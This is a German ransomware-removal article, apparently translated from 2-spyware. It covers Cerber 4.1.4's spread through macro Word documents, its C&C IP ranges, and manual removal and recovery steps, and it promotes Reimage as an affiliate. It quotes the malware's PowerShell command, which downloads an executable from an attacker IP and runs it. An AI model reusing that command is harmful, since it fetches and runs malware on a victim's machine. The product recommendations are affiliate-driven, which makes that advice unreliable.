Schweregradskala:  
  (99/100)

Cerber 4.1.4. Richtig entfernen? (Anleitung für die Deinstallation)

von Julie Splinters - - | Virustyp: Ransomware
12

Der Terror geht weiter: Cerber 4.1.4 im Umlauf

Cerber 4.1.4 ist der neue Nachfolger der Cerber-Kampagne. Es hat den Anschein, dass seitdem die Hacker mit Cerber 4.1.0 und Cerber 4.1.1 ihr Unwesen trieben, weniger als eine Woche vergangen ist. Vielleicht erachteten sie den Angriff als nicht erfolgreich genug und verstärken ihn daher mit einem weiteren Erpressungsprogramm. Die neue Version hängt weiterhin willkürliche Zeichen an die verschlüsselten Daten an. Sie scheint sich allerdings etwas von Locky abgeguckt zu haben, denn sie hat ihre Aktivierungsform ähnlich angepasst. Cerber 4.1.4 nutzt nun Word-Dokumente und erfragt sich das Aktivieren der Makroeinstellungen, damit es seine Hauptdatei herunterladen kann. Diese Masche, die von Locky übrigens durchgehend verwendet wird, ist unter IT-Experten ein eingehend besprochenes Thema. Verfolgt man die Trends in der IT-Welt mit, könnte man der Cyberbedrohung also entkommen. Wenn Sie mit der Schadsoftware infiziert worden sind, gibt es kein Grund zur Panik. Sie müssen in diesem Fall als Erstes Cerber 4.1.4 vom Gerät entfernen. Für eine schnelle Entfernung können Sie gerne von Reimage Gebrauch machen.

Die neue Version des Erpressungsprogramms verursacht weiterhin weltweit Chaos. Wie bei Cerber 4.1.0 und 4.1.1, nutzt das Programm IP-Adressen, um UDP-Pakete nach seine C&C-Server zu schicken. Die neueste Version hat für die Übertragung von statistischen Informationen die Anzahl der IP-Adressen sogar auf drei aufgestockt: 5.55.50.0/27, 192.42.118.0/27 und 194.165.16.0/22. Die Hacker können demzufolge größere Mengen von wichtigen Informationen über die Geräte sammeln und deren Hack-Strategien verbessern.

Cerber 4.1.4 rampages ruthlessly

Eine große Besonderheit der neuen Version ist außerdem die Art, wie Cerber 4.1.4 seine katastrophale Attacke beginnt. Obwohl verschiedene Varianten von dateiverschlüsselnden Viren bereits Spammails und gefälschte Rechnungen nutzen, um die Systeme anzugreifen, wechselt Cerber 4.1.4 zu Dokumenten mit Makros. Wenn das Opfer die erhaltene doc-Datei öffnet, öffnet sich ein Microsoft Word-Dokument mit einer Reihe von willkürlichen Zeichen. Aktuelle Versionen von Word haben die Makroeinstellungen zum Glück standardmäßig deaktiviert. Es wird daher gefragt, ob man sie aktivieren soll. Wenn die Einstellungen entsprechend angepasst worden sind, startet Cerber 4.1.4 die PowerShell. Kurzerhand sieht man folgende Nachricht:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‚http://94.102.58.30/~trevor/winx64.exe‘,“$env:APPDATA\winx64.exe“);Start-Process („$env:APPDATA\winx64.exe“)

Wie Sie sehen, wurde mit der Befehlszeile der Download und die Ausführung von win64.exe veranlasst. Im Falle von 32-bit Systemen heißt die ausführbare Datei vermutlich win32.exe. Der Virus speichert die Datei anschließend im Ordner %AppData%, um letztendlich wirksam zu werden. Während der Virus die Dateien verschlüsselt, lässt sich wie üblich die Datei Readme.hta auf dem Desktop finden. Ist der Verschlüsselungsprozess fertigstellt, wird das Hintergrundbild mit einer Lösegeldforderung ersetzt, die auf die Infizierung mit Cerber 4.1.4 hinweist. Mithilfe des Wertes von MachineGuid im Verzeichnis HKLM\Software\Microsoft\Cryptography der Registry, wird übrigens die Dateiendung generiert. Verschwenden Sie am besten keine Zeit und entfernen Sie Cerber 4.1.4 so schnell wie möglich.

Die Besonderheiten bei der Verbreitung

Die Virenersteller bevorzugen anscheinend nachgewiesene und wirksame Verbreitungsmethoden: Spammails. Obwohl Computernutzer ständig davor gewarnt werden nicht leichtfertig Rechnungen, Formulare oder Polizeimitteilungen von unbekannten Absendern zu öffnen, bleibt die Zahl an Infizierungen hoch. Cyberkriminelle haben ihre Überredungskünste gemeistert und bringen anvisierte Computernutzer dazu sich nach ihren Wünschen zu verhalten. Wenn Sie eine Nachricht vom FBI oder einer Steuerbehörde erhalten, sollten Sie jedoch zuerst den Absender überprüfen, bevor Sie den Anhang öffnen. Halten Sie außerdem Ausschau nach Grammatik-, Aufmachungs- oder Tippfehlern. Das Fehlen von dem entsprechenden Logo oder die Referenzen des Vertreters können ebenfalls ein Hinweis darauf sein, dass es sich um eine gefälschte E-Mail handelt.

Lässt sich der Virus vollständig entfernen?

Für die Entfernung von Cerber 4.1.4 empfehlen wir eine zuverlässige Sicherheitssoftware zu installieren. Aktualisieren Sie sie anschließend und führen Sie einen Scan aus. Anti-Spywares wie Reimage oder Malwarebytes Anti Malware entfernen Cerber 4.1.4 in der Regel innerhalb weniger Minuten. Wenn Sie allerdings hoffen, dass die Programme auch Ihre Dateien entschlüsseln, müssen wir Sie leider enttäuschen. Dafür gibt es andere Programme. Am besten lassen sich die Dateien jedoch wiederherstellen, wenn man früher angefertigte Back-ups oder das originale Entschlüsselungsprogramm nutzt. Unsere Empfehlungen für die Datenwiederherstellung finden Sie weiter unten. Wenn der Bildschirm aufgrund des Virus gesperrt ist oder Sie sonst keine Systemfunktionen nutzen können, können Sie mit folgender Anleitung den Zugriff wiederherstellen.

Wir können mit jedem Produkt, dass wir auf unserer Seite empfehlen, affiliiert sein. Weitere Auskunft in unsern Nutzungsbedingungen. Mit dem Herunterladen einer vorausgesetzten Anti-spyware Software, um Cerber 4.1.4 zu entfernen, stimmen sie unserer Datenschutz und Nutzungsbedingungen.
Jetzt säubern!
Herunterladen
Entferner: Reimage garantierte
Zufriedenheit
Herunterladen
Entferner: Reimage garantierte
Zufriedenheit
mit Microsoft Windows kompatibel mit OS X kompatibel
Was ist zu tun, wenn das Programm nicht hilft?
Wenn Sie die Infizierung nicht mit Reimage beseitigen konnten, kontaktieren Sie unser Support-Team unter Frage stellen und geben Sie so viele Informationen wie möglich.
Für die Deinstallation von Cerber 4.1.4 ist Reimage empfehlenswert. Der kostenlose Scanner lässt einen überprüfen, ob der Computer infiziert ist oder nicht. Falls Sie Schadsoftware entfernen müssen, müssen Sie die lizenzierte Version von Reimage erwerben.

Weitere Informationen über das Programm können Sie in der Beurteilung von Reimage finden.

Weitere Informationen über das Programm können Sie in der Beurteilung von Reimage finden.
Pressebeiträge auf Reimage
Pressebeiträge auf Reimage

Anleitung für die manuelle Entfernung des Cerber 4.1.4-Virus:

Entfernen Sie Cerber 4.1.4 mit Safe Mode with Networking

Reimage ist ein Programm zum Erkennen von Schadsoftware.
Für die Beseitigung von Infizierungen ist die Vollversion notwendig.
Weitere Informationen über Reimage.

  • Schritt 1: Starten Sie den Computer in den Modus Safe Mode with Networking

    Windows 7 / Vista / XP
    1. Klicken Sie auf Start Shutdown Restart OK.
    2. Sobald der Computer aktiv wird, sollten Sie anfangen mehrmals F8 zu drücken bis Sie das Fenster Advanced Boot Options sehen.
    3. Wählen Sie Safe Mode with Networking von der Liste Wählen Sie 'Safe Mode with Networking'

    Windows 10 / Windows 8
    1. Drücken Sie im Windows-Anmeldebildschirm auf den Button Power. Halten Sie nun auf Ihrer Tastatur Shift gedrückt und klicken Sie auf Restart..
    2. Wählen Sie nun Troubleshoot Advanced options Startup Settings und drücken Sie zuletzt auf Restart.
    3. Wählen Sie, sobald der Computer aktiv wird, im Fenster Startup Settings Enable Safe Mode with Networking. Wählen Sie 'Enable Safe Mode with Networking'
  • Schritt 2: Entferne Cerber 4.1.4

    Melden Sie sich am infizierten Computer an und starten Sie den Browser. Laden Sie Reimage oder eine andere legitime Anti-Spyware herunter. Aktualisieren Sie das Programm bevor Sie einen vollständigen Systemscan ausführen und entfernen Sie die schädliche Dateien, die zu der Ransomware gehören und stellen Sie die Entfernung von Cerber 4.1.4 fertig.

Probieren Sie folgende Methode aus, falls die Ransomware Safe Mode with Networking blockiert.

Entfernen Sie Cerber 4.1.4 mit System Restore

Reimage ist ein Programm zum Erkennen von Schadsoftware.
Für die Beseitigung von Infizierungen ist die Vollversion notwendig.
Weitere Informationen über Reimage.

  • Schritt 1: Starten Sie den Computer in den Modus Safe Mode with Command Prompt

    Windows 7 / Vista / XP
    1. Klicken Sie auf Start Shutdown Restart OK.
    2. Sobald der Computer aktiv wird, sollten Sie anfangen mehrmals F8 zu drücken bis Sie das Fenster Advanced Boot Options sehen.
    3. Wählen Sie Command Prompt von der Liste Wählen Sie 'Safe Mode with Command Prompt'

    Windows 10 / Windows 8
    1. Drücken Sie im Windows-Anmeldebildschirm auf den Button Power. Halten Sie nun auf Ihrer Tastatur Shift gedrückt und klicken Sie auf Restart..
    2. Wählen Sie nun Troubleshoot Advanced options Startup Settings und drücken Sie zuletzt auf Restart.
    3. Wählen Sie, sobald der Computer aktiv wird, im Fenster Startup Settings Enable Safe Mode with Command Prompt. Wählen Sie 'Enable Safe Mode with Command Prompt'
  • Schritt 2: Stellen Sie Ihre Systemdateien und -einstellungen wieder her.
    1. Sobald das Fenster Command Prompt auftaucht, geben Sie cd restore ein und klicken Sie auf Enter. Geben Sie 'cd restore' ohne die Anführungszeichen ein und drücken Sie auf 'Enter'
    2. Geben Sie nun rstrui.exe ein und drücken Sie erneut auf Enter.. Geben Sie 'rstrui.exe' ohne die Anführungszeichen ein und drücken Sie auf 'Enter'
    3. Wenn ein neues Fenster auftaucht, klicken Sie auf Next und wählen Sie einen Wiederherstellungspunkt, der vor der Infiltrierung von Cerber 4.1.4 liegt. Klicken Sie anschließend auf Next. Wenn das Fenster 'System Restore' auftaucht, wählen Sie 'Next' Wählen Sie den Wiederherstellungspunkt und klicken Sie auf 'Next'
    4. Klicken Sie nun auf Yes, um die Systemwiederherstellung zu starten. Klicken Sie auf 'Yes' und starten Sie die Systemwiederherstellung
    Nachdem Sie das System zu einem früheren Datum wiederhergestellt haben, vergewissern Sie sich, dass die Entfernung von Cerber 4.1.4 erfolgreich war, indem Sie Reimage herunterladen und damit den Computer scannen.

Bonus: Wiederherstellung der Daten

Die oben aufgeführte Anleitung soll dabei helfen Cerber 4.1.4 vom Computer zu entfernen. Für die Wiederherstellung der verschlüsselten Dateien empfehlen wir eine ausführliche Anleitung von den Sicherheitsexperten von dieviren.de zu nutzen.

Wenn Ihre Dateien von Cerber 4.1.4 verschlüsselt worden sind, haben Sie für die Wiederherstellung mehrere Möglichkeiten:

Wie effektiv ist Data Recovery Pro?

Die Anwendung ist wahrscheinlich Ihre letzte Hoffnung, wenn es darum geht wenigstens ein Teil der verschlüsselten Daten wiederherzustellen. Zumindest bis Virenforscher ein Entschlüsselungsprogramm entwickeln konnten. Data Recovery Pro ist anderenfalls auch eine praktische Anwendung, um fehlende oder beschädigte Dateien zu retten.

  • Laden Sie Data Recovery Pro (https://dieviren.de/download/data-recovery-pro-setup.exe) herunter;
  • Führen Sie die Schritte der Data Recovery aus und installieren Sie das Programm auf dem Computer;
  • Starten Sie es und scannen Sie den Computer nach Dateien, die von Cerber 4.1.4 verschlüsselt worden sind;
  • Stellen Sie sie wieder her.

Ist die Vorgängerfunktion von Windows eine Alternative?

Trotz der Zerstörungskraft des Erpressungsprogramms besteht die Chance, dass Sie mit folgenden Schritten einige Dateien retten können. Allerdings muss hierfür die Systemwiederherstellung aktiv sein.

  • Suchen Sie nach einer verschlüsselten Datei, die Sie wiederherstellen möchten und führen Sie einen Rechtsklick darauf aus;
  • Selektieren Sie “Properties” und gehen Sie zum Reiter “Previous versions”;
  • Kontrollieren Sie hier unter “Folder versions” alle verfügbaren Kopien. Wählen Sie die Version aus, die Sie wiederherstellen möchten und klicken Sie auf “Restore”.

Als Letztes sollten Sie sich natürlich immer über den Schutz vor Crypto-Ransomware Gedanken machen. Um den Computer vor Cerber 4.1.4 und anderer Ransomware zu schützen, sollten Sie eine bewährte Anti-Spyware, wie beispielsweise Reimage, Plumbytes Anti-MalwareWebroot SecureAnywhere AntiVirus oder Malwarebytes Anti Malware, nutzen.

Über den Autor

Julie Splinters
Julie Splinters

Wenn Ihnen die kostenlose Entfernungsanleitung geholfen hat und Sie mit unserem Service zufrieden sind, möchten wir Sie um eine Spende bitten, sodass wir unsere Hilfe weiter anbieten können. Jeder noch so kleine Betrag ist herzlich willkommen.

Quelle: https://www.2-spyware.com/remove-cerber-4-1-4-ransomware-virus.html

Entfernungsanleitungen in anderen Sprachen